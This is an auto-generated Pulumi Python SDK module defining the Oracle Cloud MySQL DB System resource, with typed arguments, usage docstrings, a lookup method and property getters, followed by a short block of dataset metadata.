backup_policy: Optional[pulumi.Input[pulumi.InputType['MysqlDbSystemBackupPolicyArgs']]] = None,
compartment_id: Optional[pulumi.Input[str]] = None,
configuration_id: Optional[pulumi.Input[str]] = None,
data_storage_size_in_gb: Optional[pulumi.Input[int]] = None,
defined_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
description: Optional[pulumi.Input[str]] = None,
display_name: Optional[pulumi.Input[str]] = None,
fault_domain: Optional[pulumi.Input[str]] = None,
freeform_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
hostname_label: Optional[pulumi.Input[str]] = None,
ip_address: Optional[pulumi.Input[str]] = None,
is_highly_available: Optional[pulumi.Input[bool]] = None,
maintenance: Optional[pulumi.Input[pulumi.InputType['MysqlDbSystemMaintenanceArgs']]] = None,
mysql_version: Optional[pulumi.Input[str]] = None,
port: Optional[pulumi.Input[int]] = None,
port_x: Optional[pulumi.Input[int]] = None,
shape_name: Optional[pulumi.Input[str]] = None,
shutdown_type: Optional[pulumi.Input[str]] = None,
source: Optional[pulumi.Input[pulumi.InputType['MysqlDbSystemSourceArgs']]] = None,
state: Optional[pulumi.Input[str]] = None,
subnet_id: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
This resource provides the Mysql Db System resource in Oracle Cloud Infrastructure MySQL Database service.
Creates and launches a DB System.
## Example Usage
```python
import pulumi
import pulumi_oci as oci
test_mysql_db_system = oci.mysql.MysqlDbSystem("testMysqlDbSystem",
admin_password=var["mysql_db_system_admin_password"],
admin_username=var["mysql_db_system_admin_username"],
availability_domain=var["mysql_db_system_availability_domain"],
compartment_id=var["compartment_id"],
shape_name=var["mysql_shape_name"],
subnet_id=oci_core_subnet["test_subnet"]["id"],
backup_policy=oci.mysql.MysqlDbSystemBackupPolicyArgs(
defined_tags={
"foo-namespace.bar-key": "value",
},
freeform_tags={
"bar-key": "value",
},
is_enabled=var["mysql_db_system_backup_policy_is_enabled"],
retention_in_days=var["mysql_db_system_backup_policy_retention_in_days"],
window_start_time=var["mysql_db_system_backup_policy_window_start_time"],
),
configuration_id=oci_audit_configuration["test_configuration"]["id"],
data_storage_size_in_gb=var["mysql_db_system_data_storage_size_in_gb"],
defined_tags={
"foo-namespace.bar-key": "value",
},
description=var["mysql_db_system_description"],
display_name=var["mysql_db_system_display_name"],
fault_domain=var["mysql_db_system_fault_domain"],
freeform_tags={
"bar-key": "value",
},
hostname_label=var["mysql_db_system_hostname_label"],
ip_address=var["mysql_db_system_ip_address"],
is_highly_available=var["mysql_db_system_is_highly_available"],
maintenance=oci.mysql.MysqlDbSystemMaintenanceArgs(
window_start_time=var["mysql_db_system_maintenance_window_start_time"],
),
port=var["mysql_db_system_port"],
port_x=var["mysql_db_system_port_x"],
source=oci.mysql.MysqlDbSystemSourceArgs(
source_type=var["mysql_db_system_source_source_type"],
backup_id=oci_mysql_mysql_backup["test_backup"]["id"],
))
```
## Import
MysqlDbSystems can be imported using the `id`, e.g.
```sh
$ pulumi import oci:mysql/mysqlDbSystem:MysqlDbSystem test_mysql_db_system "id"
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] admin_password: The password for the administrative user. The password must be between 8 and 32 characters long, and must contain at least 1 numeric character, 1 lowercase character, 1 uppercase character, and 1 special (nonalphanumeric) character.
:param pulumi.Input[str] admin_username: The username for the administrative user.
:param pulumi.Input[str] availability_domain: The availability domain on which to deploy the Read/Write endpoint. This defines the preferred primary instance.
:param pulumi.Input[pulumi.InputType['MysqlDbSystemBackupPolicyArgs']] backup_policy: (Updatable) Backup policy as optionally used for DB System Creation.
:param pulumi.Input[str] compartment_id: The OCID of the compartment.
:param pulumi.Input[str] configuration_id: The OCID of the Configuration to be used for this DB System.
:param pulumi.Input[int] data_storage_size_in_gb: Initial size of the data volume in GBs that will be created and attached. Keep in mind that this only specifies the size of the database data volume, the log volume for the database will be scaled appropriately with its shape. It is required if you are creating a new database. It cannot be set if you are creating a database from a backup.
:param pulumi.Input[Mapping[str, Any]] defined_tags: (Updatable) Usage of predefined tag keys. These predefined keys are scoped to namespaces. Example: `{"foo-namespace.bar-key": "value"}`
:param pulumi.Input[str] description: (Updatable) User-provided data about the DB System.
:param pulumi.Input[str] display_name: (Updatable) The user-friendly name for the DB System. It does not have to be unique.
:param pulumi.Input[str] fault_domain: The fault domain on which to deploy the Read/Write endpoint. This defines the preferred primary instance.
:param pulumi.Input[Mapping[str, Any]] freeform_tags: (Updatable) Simple key-value pair applied without any predefined name, type or scope. Exists for cross-compatibility only. Example: `{"bar-key": "value"}`
:param pulumi.Input[str] hostname_label: The hostname for the primary endpoint of the DB System. Used for DNS.
:param pulumi.Input[str] ip_address: The IP address the DB System is configured to listen on. A private IP address of your choice to assign to the primary endpoint of the DB System. Must be an available IP address within the subnet's CIDR. If you don't specify a value, Oracle automatically assigns a private IP address from the subnet. This should be a "dotted-quad" style IPv4 address.
:param pulumi.Input[bool] is_highly_available: (Updatable) Specifies if the DB System is highly available.
:param pulumi.Input[pulumi.InputType['MysqlDbSystemMaintenanceArgs']] maintenance: (Updatable) The Maintenance Policy for the DB System. `maintenance` and `backup_policy` cannot be updated in the same request.
:param pulumi.Input[str] mysql_version: Name of the MySQL Version in use for the DB System.
:param pulumi.Input[int] port: The port for primary endpoint of the DB System to listen on.
:param pulumi.Input[int] port_x: The TCP network port on which X Plugin listens for connections. This is the X Plugin equivalent of port.
:param pulumi.Input[str] shape_name: The name of the shape. The shape determines the resources allocated
* CPU cores and memory for VM shapes; CPU cores, memory and storage for non-VM (or bare metal) shapes. To get a list of shapes, use the [ListShapes](https://docs.cloud.oracle.com/iaas/api/#/en/mysql/20190415/ShapeSummary/ListShapes) operation.
:param pulumi.Input[str] shutdown_type: It is applicable only for stopping a DB System. Could be set to `FAST`, `SLOW` or `IMMEDIATE`. Default value is `FAST`.
:param pulumi.Input[pulumi.InputType['MysqlDbSystemSourceArgs']] source: Parameters detailing how to provision the initial data of the system.
:param pulumi.Input[str] state: (Updatable) The target state for the DB System. Could be set to `ACTIVE` or `INACTIVE`.
:param pulumi.Input[str] subnet_id: The OCID of the subnet the DB System is associated with.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: MysqlDbSystemArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
This resource provides the Mysql Db System resource in Oracle Cloud Infrastructure MySQL Database service.
Creates and launches a DB System.
## Example Usage
```python
import pulumi
import pulumi_oci as oci
test_mysql_db_system = oci.mysql.MysqlDbSystem("testMysqlDbSystem",
admin_password=var["mysql_db_system_admin_password"],
admin_username=var["mysql_db_system_admin_username"],
availability_domain=var["mysql_db_system_availability_domain"],
compartment_id=var["compartment_id"],
shape_name=var["mysql_shape_name"],
subnet_id=oci_core_subnet["test_subnet"]["id"],
backup_policy=oci.mysql.MysqlDbSystemBackupPolicyArgs(
defined_tags={
"foo-namespace.bar-key": "value",
},
freeform_tags={
"bar-key": "value",
},
is_enabled=var["mysql_db_system_backup_policy_is_enabled"],
retention_in_days=var["mysql_db_system_backup_policy_retention_in_days"],
window_start_time=var["mysql_db_system_backup_policy_window_start_time"],
),
configuration_id=oci_audit_configuration["test_configuration"]["id"],
data_storage_size_in_gb=var["mysql_db_system_data_storage_size_in_gb"],
defined_tags={
"foo-namespace.bar-key": "value",
},
description=var["mysql_db_system_description"],
display_name=var["mysql_db_system_display_name"],
fault_domain=var["mysql_db_system_fault_domain"],
freeform_tags={
"bar-key": "value",
},
hostname_label=var["mysql_db_system_hostname_label"],
ip_address=var["mysql_db_system_ip_address"],
is_highly_available=var["mysql_db_system_is_highly_available"],
maintenance=oci.mysql.MysqlDbSystemMaintenanceArgs(
window_start_time=var["mysql_db_system_maintenance_window_start_time"],
),
port=var["mysql_db_system_port"],
port_x=var["mysql_db_system_port_x"],
source=oci.mysql.MysqlDbSystemSourceArgs(
source_type=var["mysql_db_system_source_source_type"],
backup_id=oci_mysql_mysql_backup["test_backup"]["id"],
))
```
## Import
MysqlDbSystems can be imported using the `id`, e.g.
```sh
$ pulumi import oci:mysql/mysqlDbSystem:MysqlDbSystem test_mysql_db_system "id"
```
:param str resource_name: The name of the resource.
:param MysqlDbSystemArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(MysqlDbSystemArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
admin_password: Optional[pulumi.Input[str]] = None,
admin_username: Optional[pulumi.Input[str]] = None,
availability_domain: Optional[pulumi.Input[str]] = None,
backup_policy: Optional[pulumi.Input[pulumi.InputType['MysqlDbSystemBackupPolicyArgs']]] = None,
compartment_id: Optional[pulumi.Input[str]] = None,
configuration_id: Optional[pulumi.Input[str]] = None,
data_storage_size_in_gb: Optional[pulumi.Input[int]] = None,
defined_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
description: Optional[pulumi.Input[str]] = None,
display_name: Optional[pulumi.Input[str]] = None,
fault_domain: Optional[pulumi.Input[str]] = None,
freeform_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
hostname_label: Optional[pulumi.Input[str]] = None,
ip_address: Optional[pulumi.Input[str]] = None,
is_highly_available: Optional[pulumi.Input[bool]] = None,
maintenance: Optional[pulumi.Input[pulumi.InputType['MysqlDbSystemMaintenanceArgs']]] = None,
mysql_version: Optional[pulumi.Input[str]] = None,
port: Optional[pulumi.Input[int]] = None,
port_x: Optional[pulumi.Input[int]] = None,
shape_name: Optional[pulumi.Input[str]] = None,
shutdown_type: Optional[pulumi.Input[str]] = None,
source: Optional[pulumi.Input[pulumi.InputType['MysqlDbSystemSourceArgs']]] = None,
state: Optional[pulumi.Input[str]] = None,
subnet_id: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = MysqlDbSystemArgs.__new__(MysqlDbSystemArgs)
if admin_password is None and not opts.urn:
raise TypeError("Missing required property 'admin_password'")
__props__.__dict__["admin_password"] = admin_password
if admin_username is None and not opts.urn:
raise TypeError("Missing required property 'admin_username'")
__props__.__dict__["admin_username"] = admin_username
if availability_domain is None and not opts.urn:
raise TypeError("Missing required property 'availability_domain'")
__props__.__dict__["availability_domain"] = availability_domain
__props__.__dict__["backup_policy"] = backup_policy
if compartment_id is None and not opts.urn:
raise TypeError("Missing required property 'compartment_id'")
__props__.__dict__["compartment_id"] = compartment_id
__props__.__dict__["configuration_id"] = configuration_id
__props__.__dict__["data_storage_size_in_gb"] = data_storage_size_in_gb
__props__.__dict__["defined_tags"] = defined_tags
__props__.__dict__["description"] = description
__props__.__dict__["display_name"] = display_name
__props__.__dict__["fault_domain"] = fault_domain
__props__.__dict__["freeform_tags"] = freeform_tags
__props__.__dict__["hostname_label"] = hostname_label
__props__.__dict__["ip_address"] = ip_address
__props__.__dict__["is_highly_available"] = is_highly_available
__props__.__dict__["maintenance"] = maintenance
if mysql_version is not None and not opts.urn:
warnings.warn("""The 'mysql_version' field has been deprecated and may be removed in a future version. Do not use this field.""", DeprecationWarning)
pulumi.log.warn("""mysql_version is deprecated: The 'mysql_version' field has been deprecated and may be removed in a future version. Do not use this field.""")
__props__.__dict__["mysql_version"] = mysql_version
__props__.__dict__["port"] = port
__props__.__dict__["port_x"] = port_x
if shape_name is None and not opts.urn:
raise TypeError("Missing required property 'shape_name'")
__props__.__dict__["shape_name"] = shape_name
__props__.__dict__["shutdown_type"] = shutdown_type
__props__.__dict__["source"] = source
__props__.__dict__["state"] = state
if subnet_id is None and not opts.urn:
raise TypeError("Missing required property 'subnet_id'")
__props__.__dict__["subnet_id"] = subnet_id
__props__.__dict__["analytics_cluster"] = None
__props__.__dict__["channels"] = None
__props__.__dict__["current_placement"] = None
__props__.__dict__["endpoints"] = None
__props__.__dict__["heat_wave_cluster"] = None
__props__.__dict__["is_analytics_cluster_attached"] = None
__props__.__dict__["is_heat_wave_cluster_attached"] = None
__props__.__dict__["lifecycle_details"] = None
__props__.__dict__["time_created"] = None
__props__.__dict__["time_updated"] = None
super(MysqlDbSystem, __self__).__init__(
'oci:mysql/mysqlDbSystem:MysqlDbSystem',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
admin_password: Optional[pulumi.Input[str]] = None,
admin_username: Optional[pulumi.Input[str]] = None,
analytics_cluster: Optional[pulumi.Input[pulumi.InputType['MysqlDbSystemAnalyticsClusterArgs']]] = None,
availability_domain: Optional[pulumi.Input[str]] = None,
backup_policy: Optional[pulumi.Input[pulumi.InputType['MysqlDbSystemBackupPolicyArgs']]] = None,
channels: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MysqlDbSystemChannelArgs']]]]] = None,
compartment_id: Optional[pulumi.Input[str]] = None,
configuration_id: Optional[pulumi.Input[str]] = None,
current_placement: Optional[pulumi.Input[pulumi.InputType['MysqlDbSystemCurrentPlacementArgs']]] = None,
data_storage_size_in_gb: Optional[pulumi.Input[int]] = None,
defined_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
description: Optional[pulumi.Input[str]] = None,
display_name: Optional[pulumi.Input[str]] = None,
endpoints: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MysqlDbSystemEndpointArgs']]]]] = None,
fault_domain: Optional[pulumi.Input[str]] = None,
freeform_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
heat_wave_cluster: Optional[pulumi.Input[pulumi.InputType['MysqlDbSystemHeatWaveClusterArgs']]] = None,
hostname_label: Optional[pulumi.Input[str]] = None,
ip_address: Optional[pulumi.Input[str]] = None,
is_analytics_cluster_attached: Optional[pulumi.Input[bool]] = None,
is_heat_wave_cluster_attached: Optional[pulumi.Input[bool]] = None,
is_highly_available: Optional[pulumi.Input[bool]] = None,
lifecycle_details: Optional[pulumi.Input[str]] = None,
maintenance: Optional[pulumi.Input[pulumi.InputType['MysqlDbSystemMaintenanceArgs']]] = None,
mysql_version: Optional[pulumi.Input[str]] = None,
port: Optional[pulumi.Input[int]] = None,
port_x: Optional[pulumi.Input[int]] = None,
shape_name: Optional[pulumi.Input[str]] = None,
shutdown_type: Optional[pulumi.Input[str]] = None,
source: Optional[pulumi.Input[pulumi.InputType['MysqlDbSystemSourceArgs']]] = None,
state: Optional[pulumi.Input[str]] = None,
subnet_id: Optional[pulumi.Input[str]] = None,
time_created: Optional[pulumi.Input[str]] = None,
time_updated: Optional[pulumi.Input[str]] = None) -> 'MysqlDbSystem':
"""
Get an existing MysqlDbSystem resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] admin_password: The password for the administrative user. The password must be between 8 and 32 characters long, and must contain at least 1 numeric character, 1 lowercase character, 1 uppercase character, and 1 special (nonalphanumeric) character.
:param pulumi.Input[str] admin_username: The username for the administrative user.
:param pulumi.Input[pulumi.InputType['MysqlDbSystemAnalyticsClusterArgs']] analytics_cluster: DEPRECATED -- please use HeatWave API instead. A summary of an Analytics Cluster.
:param pulumi.Input[str] availability_domain: The availability domain on which to deploy the Read/Write endpoint. This defines the preferred primary instance.
:param pulumi.Input[pulumi.InputType['MysqlDbSystemBackupPolicyArgs']] backup_policy: (Updatable) Backup policy as optionally used for DB System Creation.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MysqlDbSystemChannelArgs']]]] channels: A list with a summary of all the Channels attached to the DB System.
:param pulumi.Input[str] compartment_id: The OCID of the compartment.
:param pulumi.Input[str] configuration_id: The OCID of the Configuration to be used for this DB System.
:param pulumi.Input[pulumi.InputType['MysqlDbSystemCurrentPlacementArgs']] current_placement: The availability domain and fault domain a DB System is placed in.
:param pulumi.Input[int] data_storage_size_in_gb: Initial size of the data volume in GBs that will be created and attached. Keep in mind that this only specifies the size of the database data volume, the log volume for the database will be scaled appropriately with its shape. It is required if you are creating a new database. It cannot be set if you are creating a database from a backup.
:param pulumi.Input[Mapping[str, Any]] defined_tags: (Updatable) Usage of predefined tag keys. These predefined keys are scoped to namespaces. Example: `{"foo-namespace.bar-key": "value"}`
:param pulumi.Input[str] description: (Updatable) User-provided data about the DB System.
:param pulumi.Input[str] display_name: (Updatable) The user-friendly name for the DB System. It does not have to be unique.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MysqlDbSystemEndpointArgs']]]] endpoints: The network endpoints available for this DB System.
:param pulumi.Input[str] fault_domain: The fault domain on which to deploy the Read/Write endpoint. This defines the preferred primary instance.
:param pulumi.Input[Mapping[str, Any]] freeform_tags: (Updatable) Simple key-value pair applied without any predefined name, type or scope. Exists for cross-compatibility only. Example: `{"bar-key": "value"}`
:param pulumi.Input[pulumi.InputType['MysqlDbSystemHeatWaveClusterArgs']] heat_wave_cluster: A summary of a HeatWave cluster.
:param pulumi.Input[str] hostname_label: The hostname for the primary endpoint of the DB System. Used for DNS.
:param pulumi.Input[str] ip_address: The IP address the DB System is configured to listen on. A private IP address of your choice to assign to the primary endpoint of the DB System. Must be an available IP address within the subnet's CIDR. If you don't specify a value, Oracle automatically assigns a private IP address from the subnet. This should be a "dotted-quad" style IPv4 address.
:param pulumi.Input[bool] is_analytics_cluster_attached: DEPRECATED -- please use `isHeatWaveClusterAttached` instead. If the DB System has an Analytics Cluster attached.
:param pulumi.Input[bool] is_heat_wave_cluster_attached: If the DB System has a HeatWave Cluster attached.
:param pulumi.Input[bool] is_highly_available: (Updatable) Specifies if the DB System is highly available.
:param pulumi.Input[str] lifecycle_details: Additional information about the current lifecycleState.
:param pulumi.Input[pulumi.InputType['MysqlDbSystemMaintenanceArgs']] maintenance: (Updatable) The Maintenance Policy for the DB System. `maintenance` and `backup_policy` cannot be updated in the same request.
:param pulumi.Input[str] mysql_version: Name of the MySQL Version in use for the DB System.
:param pulumi.Input[int] port: The port for primary endpoint of the DB System to listen on.
:param pulumi.Input[int] port_x: The TCP network port on which X Plugin listens for connections. This is the X Plugin equivalent of port.
:param pulumi.Input[str] shape_name: The name of the shape. The shape determines the resources allocated
* CPU cores and memory for VM shapes; CPU cores, memory and storage for non-VM (or bare metal) shapes. To get a list of shapes, use the [ListShapes](https://docs.cloud.oracle.com/iaas/api/#/en/mysql/20190415/ShapeSummary/ListShapes) operation.
:param pulumi.Input[str] shutdown_type: It is applicable only for stopping a DB System. Could be set to `FAST`, `SLOW` or `IMMEDIATE`. Default value is `FAST`.
:param pulumi.Input[pulumi.InputType['MysqlDbSystemSourceArgs']] source: Parameters detailing how to provision the initial data of the system.
:param pulumi.Input[str] state: (Updatable) The target state for the DB System. Could be set to `ACTIVE` or `INACTIVE`.
:param pulumi.Input[str] subnet_id: The OCID of the subnet the DB System is associated with.
:param pulumi.Input[str] time_created: The date and time the DB System was created.
:param pulumi.Input[str] time_updated: The time the DB System was last updated.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _MysqlDbSystemState.__new__(_MysqlDbSystemState)
__props__.__dict__["admin_password"] = admin_password
__props__.__dict__["admin_username"] = admin_username
__props__.__dict__["analytics_cluster"] = analytics_cluster
__props__.__dict__["availability_domain"] = availability_domain
__props__.__dict__["backup_policy"] = backup_policy
__props__.__dict__["channels"] = channels
__props__.__dict__["compartment_id"] = compartment_id
__props__.__dict__["configuration_id"] = configuration_id
__props__.__dict__["current_placement"] = current_placement
__props__.__dict__["data_storage_size_in_gb"] = data_storage_size_in_gb
__props__.__dict__["defined_tags"] = defined_tags
__props__.__dict__["description"] = description
__props__.__dict__["display_name"] = display_name
__props__.__dict__["endpoints"] = endpoints
__props__.__dict__["fault_domain"] = fault_domain
__props__.__dict__["freeform_tags"] = freeform_tags
__props__.__dict__["heat_wave_cluster"] = heat_wave_cluster
__props__.__dict__["hostname_label"] = hostname_label
__props__.__dict__["ip_address"] = ip_address
__props__.__dict__["is_analytics_cluster_attached"] = is_analytics_cluster_attached
__props__.__dict__["is_heat_wave_cluster_attached"] = is_heat_wave_cluster_attached
__props__.__dict__["is_highly_available"] = is_highly_available
__props__.__dict__["lifecycle_details"] = lifecycle_details
__props__.__dict__["maintenance"] = maintenance
__props__.__dict__["mysql_version"] = mysql_version
__props__.__dict__["port"] = port
__props__.__dict__["port_x"] = port_x
__props__.__dict__["shape_name"] = shape_name
__props__.__dict__["shutdown_type"] = shutdown_type
__props__.__dict__["source"] = source
__props__.__dict__["state"] = state
__props__.__dict__["subnet_id"] = subnet_id
__props__.__dict__["time_created"] = time_created
__props__.__dict__["time_updated"] = time_updated
return MysqlDbSystem(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="adminPassword")
def admin_password(self) -> pulumi.Output[str]:
"""
The password for the administrative user. The password must be between 8 and 32 characters long, and must contain at least 1 numeric character, 1 lowercase character, 1 uppercase character, and 1 special (nonalphanumeric) character.
"""
return pulumi.get(self, "admin_password")
@property
@pulumi.getter(name="adminUsername")
def admin_username(self) -> pulumi.Output[str]:
"""
The username for the administrative user.
"""
return pulumi.get(self, "admin_username")
@property
@pulumi.getter(name="analyticsCluster")
def analytics_cluster(self) -> pulumi.Output['outputs.MysqlDbSystemAnalyticsCluster']:
"""
DEPRECATED -- please use HeatWave API instead. A summary of an Analytics Cluster.
"""
return pulumi.get(self, "analytics_cluster")
@property
@pulumi.getter(name="availabilityDomain")
def availability_domain(self) -> pulumi.Output[str]:
"""
The availability domain on which to deploy the Read/Write endpoint. This defines the preferred primary instance.
"""
return pulumi.get(self, "availability_domain")
@property
@pulumi.getter(name="backupPolicy")
def backup_policy(self) -> pulumi.Output['outputs.MysqlDbSystemBackupPolicy']:
"""
(Updatable) Backup policy as optionally used for DB System Creation.
"""
return pulumi.get(self, "backup_policy")
@property
@pulumi.getter
def channels(self) -> pulumi.Output[Sequence['outputs.MysqlDbSystemChannel']]:
"""
A list with a summary of all the Channels attached to the DB System.
"""
return pulumi.get(self, "channels")
@property
@pulumi.getter(name="compartmentId")
def compartment_id(self) -> pulumi.Output[str]:
"""
The OCID of the compartment.
"""
return pulumi.get(self, "compartment_id")
@property
@pulumi.getter(name="configurationId")
def configuration_id(self) -> pulumi.Output[str]:
"""
The OCID of the Configuration to be used for this DB System.
"""
return pulumi.get(self, "configuration_id")
@property
@pulumi.getter(name="currentPlacement")
def current_placement(self) -> pulumi.Output['outputs.MysqlDbSystemCurrentPlacement']:
"""
The availability domain and fault domain a DB System is placed in.
"""
return pulumi.get(self, "current_placement")
@property
@pulumi.getter(name="dataStorageSizeInGb")
def data_storage_size_in_gb(self) -> pulumi.Output[int]:
"""
Initial size of the data volume in GBs that will be created and attached. Keep in mind that this only specifies the size of the database data volume, the log volume for the database will be scaled appropriately with its shape. It is required if you are creating a new database. It cannot be set if you are creating a database from a backup.
"""
return pulumi.get(self, "data_storage_size_in_gb")
@property
@pulumi.getter(name="definedTags")
def defined_tags(self) -> pulumi.Output[Mapping[str, Any]]:
"""
(Updatable) Usage of predefined tag keys. These predefined keys are scoped to namespaces. Example: `{"foo-namespace.bar-key": "value"}`
"""
return pulumi.get(self, "defined_tags")
@property
@pulumi.getter
def description(self) -> pulumi.Output[str]:
"""
(Updatable) User-provided data about the DB System.
"""
return pulumi.get(self, "description")
@property
@pulumi.getter(name="displayName")
def display_name(self) -> pulumi.Output[str]:
"""
(Updatable) The user-friendly name for the DB System. It does not have to be unique.
"""
return pulumi.get(self, "display_name")
@property
@pulumi.getter
def endpoints(self) -> pulumi.Output[Sequence['outputs.MysqlDbSystemEndpoint']]:
"""
The network endpoints available for this DB System.
"""
return pulumi.get(self, "endpoints")
@property
@pulumi.getter(name="faultDomain")
def fault_domain(self) -> pulumi.Output[str]:
"""
The fault domain on which to deploy the Read/Write endpoint. This defines the preferred primary instance.
"""
return pulumi.get(self, "fault_domain")
@property
@pulumi.getter(name="freeformTags")
def freeform_tags(self) -> pulumi.Output[Mapping[str, Any]]:
"""
(Updatable) Simple key-value pair applied without any predefined name, type or scope. Exists for cross-compatibility only. Example: `{"bar-key": "value"}`
"""
return pulumi.get(self, "freeform_tags")
@property
@pulumi.getter(name="heatWaveCluster")
def heat_wave_cluster(self) -> pulumi.Output['outputs.MysqlDbSystemHeatWaveCluster']:
"""
A summary of a HeatWave cluster.
"""
return pulumi.get(self, "heat_wave_cluster")
@property
@pulumi.getter(name="hostnameLabel")
def hostname_label(self) -> pulumi.Output[str]:
"""
The hostname for the primary endpoint of the DB System. Used for DNS.
"""
return pulumi.get(self, "hostname_label")
@property
@pulumi.getter(name="ipAddress")
def ip_address(self) -> pulumi.Output[str]:
"""
The IP address the DB System is configured to listen on. A private IP address of your choice to assign to the primary endpoint of the DB System. Must be an available IP address within the subnet's CIDR. If you don't specify a value, Oracle automatically assigns a private IP address from the subnet. This should be a "dotted-quad" style IPv4 address.
"""
return pulumi.get(self, "ip_address")
@property
@pulumi.getter(name="isAnalyticsClusterAttached")
def is_analytics_cluster_attached(self) -> pulumi.Output[bool]:
"""
DEPRECATED -- please use `isHeatWaveClusterAttached` instead. If the DB System has an Analytics Cluster attached.
"""
return pulumi.get(self, "is_analytics_cluster_attached")
@property
@pulumi.getter(name="isHeatWaveClusterAttached")
def is_heat_wave_cluster_attached(self) -> pulumi.Output[bool]:
"""
If the DB System has a HeatWave Cluster attached.
"""
return pulumi.get(self, "is_heat_wave_cluster_attached")
@property
@pulumi.getter(name="isHighlyAvailable")
def is_highly_available(self) -> pulumi.Output[bool]:
"""
(Updatable) Specifies if the DB System is highly available.
"""
return pulumi.get(self, "is_highly_available")
@property
@pulumi.getter(name="lifecycleDetails")
def lifecycle_details(self) -> pulumi.Output[str]:
"""
Additional information about the current lifecycleState.
"""
return pulumi.get(self, "lifecycle_details")
@property
@pulumi.getter
def maintenance(self) -> pulumi.Output['outputs.MysqlDbSystemMaintenance']:
"""
(Updatable) The Maintenance Policy for the DB System. `maintenance` and `backup_policy` cannot be updated in the same request.
"""
return pulumi.get(self, "maintenance")
@property
@pulumi.getter(name="mysqlVersion")
def mysql_version(self) -> pulumi.Output[str]:
"""
Name of the MySQL Version in use for the DB System.
"""
return pulumi.get(self, "mysql_version")
@property
@pulumi.getter
def port(self) -> pulumi.Output[int]:
"""
The port for primary endpoint of the DB System to listen on.
"""
return pulumi.get(self, "port")
@property
@pulumi.getter(name="portX")
def port_x(self) -> pulumi.Output[int]:
"""
The TCP network port on which X Plugin listens for connections. This is the X Plugin equivalent of port.
"""
return pulumi.get(self, "port_x")
@property
@pulumi.getter(name="shapeName")
def shape_name(self) -> pulumi.Output[str]:
"""
The name of the shape. The shape determines the resources allocated
* CPU cores and memory for VM shapes; CPU cores, memory and storage for non-VM (or bare metal) shapes. To get a list of shapes, use the [ListShapes](https://docs.cloud.oracle.com/iaas/api/#/en/mysql/20190415/ShapeSummary/ListShapes) operation.
"""
return pulumi.get(self, "shape_name")
@property
@pulumi.getter(name="shutdownType")
def shutdown_type(self) -> pulumi.Output[Optional[str]]:
"""
It is applicable only for stopping a DB System. Could be set to `FAST`, `SLOW` or `IMMEDIATE`. Default value is `FAST`.
"""
return pulumi.get(self, "shutdown_type")
@property
@pulumi.getter
def source(self) -> pulumi.Output['outputs.MysqlDbSystemSource']:
"""
Parameters detailing how to provision the initial data of the system.
"""
return pulumi.get(self, "source")
@property
@pulumi.getter
def state(self) -> pulumi.Output[str]:
"""
(Updatable) The target state for the DB System. Could be set to `ACTIVE` or `INACTIVE`.
"""
return pulumi.get(self, "state")
@property
@pulumi.getter(name="subnetId")
def subnet_id(self) -> pulumi.Output[str]:
"""
The OCID of the subnet the DB System is associated with.
"""
return pulumi.get(self, "subnet_id")
@property
@pulumi.getter(name="timeCreated")
def time_created(self) -> pulumi.Output[str]:
"""
The date and time the DB System was created.
"""
return pulumi.get(self, "time_created")
@property
@pulumi.getter(name="timeUpdated")
def time_updated(self) -> pulumi.Output[str]:
"""
The time the DB System was last updated.
"""
return pulumi.get(self, "time_updated")
| 52.822532
| 398
| 0.673799
| 10,737
| 87,210
| 5.271305
| 0.037254
| 0.075409
| 0.079897
| 0.050143
| 0.946023
| 0.927789
| 0.913018
| 0.894731
| 0.884466
| 0.858264
| 0
| 0.001676
| 0.226992
| 87,210
| 1,650
| 399
| 52.854545
| 0.837882
| 0.387387
| 0
| 0.769149
| 1
| 0.006383
| 0.150031
| 0.046285
| 0
| 0
| 0
| 0
| 0
| 1
| 0.167021
| false
| 0.029787
| 0.007447
| 0
| 0.276596
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
b8ad984c14225235db0101678fc68a00b63c1abf
| 11,096
|
py
|
Python
|
NearBeach/tests/tests_user_permissions/test_admin_only.py
|
raulrusu88/NearBeach
|
e65c8c27aa3969ac6f56a2f970776994a65771b5
|
[
"MIT"
] | 94
|
2017-02-11T01:06:21.000Z
|
2022-03-04T06:17:22.000Z
|
